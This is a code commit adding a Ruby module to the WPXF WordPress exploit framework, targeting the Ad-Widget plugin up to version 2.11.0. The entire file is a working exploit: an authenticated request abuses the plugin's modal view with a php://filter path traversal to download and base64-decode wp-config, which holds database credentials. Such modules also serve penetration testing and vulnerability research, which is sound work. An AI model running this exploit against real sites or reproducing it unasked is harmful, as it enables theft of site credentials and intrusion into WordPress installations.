Add Ad-Widget <= 2.11.0 authenticated PHP file download

Author: rastating

modules/auxiliary/ad_widget_php_file_download.rb

@@ -0,0 +1,55 @@
+class Wpxf::Auxiliary::AdWidgetPhpFileDownload < Wpxf::Module
+  include Wpxf::WordPress::FileDownload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Ad-Widget <= 2.11.0 Authenticated PHP File Download',
+      author: [
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8789']
+      ],
+      date: 'Apr 04 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('ad-widget', '2.12.0')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def default_remote_file_path
+    '../wp-config'
+  end
+
+  def working_directory
+    'wp-admin/'
+  end
+
+  def downloader_url
+    normalize_uri(wordpress_url_plugins, 'ad-widget', 'views', 'modal', 'index.php')
+  end
+
+  def validate_result(res)
+    return false unless super(res)
+
+    if export_path.nil?
+      res.body = Base64.decode64(res.body)
+    else
+      content = Base64.decode64(File.read(export_path))
+      File.open(export_path, 'wb') { |f| f.write(content) }
+    end
+
+    true
+  end
+
+  def download_request_params
+    { 'step' => "php://filter/convert.base64-encode/resource=#{remote_file}" }
+  end
+end